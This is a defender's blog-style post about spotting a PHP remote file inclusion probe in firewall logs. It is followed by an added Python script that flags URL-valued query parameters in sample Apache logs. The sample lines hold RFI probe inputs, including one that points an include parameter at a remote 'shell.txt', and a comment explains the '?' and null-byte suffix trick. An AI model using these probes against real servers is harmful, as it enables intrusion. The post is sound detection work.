Early, a co-worker came to me asking if I had seen the note from our DDoS mitigation provider. It was the first such email to provide a source address for the attack. The "attack" only lasted four minutes and, to me, was not much to worry about. However, there was at least an indicator to look for in the logs. I popped the source address into our firewall logs and got 134 records back, all targeting various servers of ours.
And here was the unique finding. Every request string looked something like:
http://ourserver/some_bogus_directory/some_bogus_file.php?php121dir=http://www.google.com/humans.txt
I fully admit, I had never heard of a humans.txt file; I knew about robots.txt, but not humans.txt. So I looked it up. We don't use it. Next, I fetched Google's humans.txt file to see what was in there. Nothing untoward.
The best I can come up with is that this is some kind of remote file inclusion probe, and the attacker is looking for vulnerable PHP servers. Pointing the php121dir parameter at a harmless, always-available file such as Google's humans.txt lets the scanner test whether a script passes that value to include() and whether the server will fetch remote URLs: a vulnerable server returns the contents of humans.txt in its response, and the follow-up request would swap in a real payload.
I found a great site that had a little more info here, but their mitigation used .htaccess; we use our firewall. I did not find much more information, so anyone who wants to shed a little more light on the subject, feel free to leave a comment.
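Since the tell in those 134 records is a query parameter whose value is itself a URL, the same indicator can be pulled out of ordinary web server logs without knowing the parameter name in advance. The following is an added example, not code from the original post or from any tool it mentions; it runs over a few constructed Apache combined-format lines (documentation IP ranges, made-up paths) and flags every parameter that points at a remote host, then counts hits per source address so a single scanner stands out the way the 134-record source did here.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache "combined" format; the 203.0.113.x
# and 198.51.100.x addresses are documentation ranges, not real hosts.
SAMPLE_LOG = """\
203.0.113.45 - - [10/Mar/2012:08:14:02 +0000] "GET /some_bogus_directory/some_bogus_file.php?php121dir=http://www.google.com/humans.txt HTTP/1.1" 404 512 "-" "Mozilla/5.0"
203.0.113.45 - - [10/Mar/2012:08:14:03 +0000] "GET /forum/index.php?php121dir=http://www.google.com/humans.txt? HTTP/1.1" 404 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2012:08:15:10 +0000] "GET /products.php?id=42&page=2 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.45 - - [10/Mar/2012:08:14:05 +0000] "GET /blog/plugin.php?dir=https://203.0.113.9/shell.txt%3F HTTP/1.1" 404 512 "-" "curl/7.22"
198.51.100.7 - - [10/Mar/2012:08:16:30 +0000] "GET /redirect.php?next=/account HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Source, timestamp, method, request target and status from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# A parameter value that is itself an absolute URL is the RFI tell: the probe
# asks the script to include() a file fetched from another host.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def is_remote_url(value):
    return bool(REMOTE_URL_RE.match(value.strip()))


def parse_line(line):
    """Return the fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_rfi_probes(log_text):
    """Return one record per query parameter whose value is a remote URL."""
    probes = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if is_remote_url(value):
                probes.append({
                    "src": rec["src"],
                    "ts": rec["ts"],
                    "path": parts.path,
                    "param": name,
                    "value": value,
                    "status": int(rec["status"]),
                    # A trailing '?' (or a null byte on older PHP) is appended to
                    # swallow any suffix the script concatenates after the value,
                    # e.g. include($dir . "/config.php").
                    "suffix_trick": value.endswith("?") or "\x00" in value,
                })
    return probes


def summarize_by_source(probes):
    """Count probe hits per source address so one scanner stands out."""
    return Counter(p["src"] for p in probes)


if __name__ == "__main__":
    hits = find_rfi_probes(SAMPLE_LOG)
    for p in hits:
        print(f'{p["src"]} {p["path"]} {p["param"]}={p["value"]} -> {p["status"]}')
    print(summarize_by_source(hits))
```

The 404s against paths that do not exist are expected: a scanner sprays the same parameter at many candidate scripts, and a hit only matters where the script is actually present and passes the parameter to include(). Checking response status and size for the probed URL (a 200 whose body contains the remote file's text) is the quickest way to tell a blind probe from a host that is really vulnerable.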